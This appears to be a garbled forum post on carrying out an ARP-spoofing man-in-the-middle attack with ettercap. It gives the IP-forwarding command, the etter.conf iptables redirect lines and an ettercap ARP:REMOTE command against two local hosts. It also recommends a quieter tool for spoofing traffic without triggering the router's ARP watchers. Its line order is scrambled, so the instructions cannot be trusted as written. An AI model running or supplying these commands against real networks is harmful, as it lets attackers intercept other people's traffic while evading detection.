considering you have started forwarding network traffic by:
and in your etter.conf file removed the # tags.Code:echo 1 > /proc/sys/net/ipv4/ip_forward
to look likeCode:#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Consider that running the command:Code:redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
will cause the router's arp wathcers to suspend traffic, sometimes from the whole router. Check out YAMAS (http://comax.fr/yamas.php) to see how some of the same commands are used in quiet mode to spoof network traffic without setting off red flags.ettercap -TQM ARP:REMOTE -i eth0 /10.0.0.1/ /10.0.0.2/


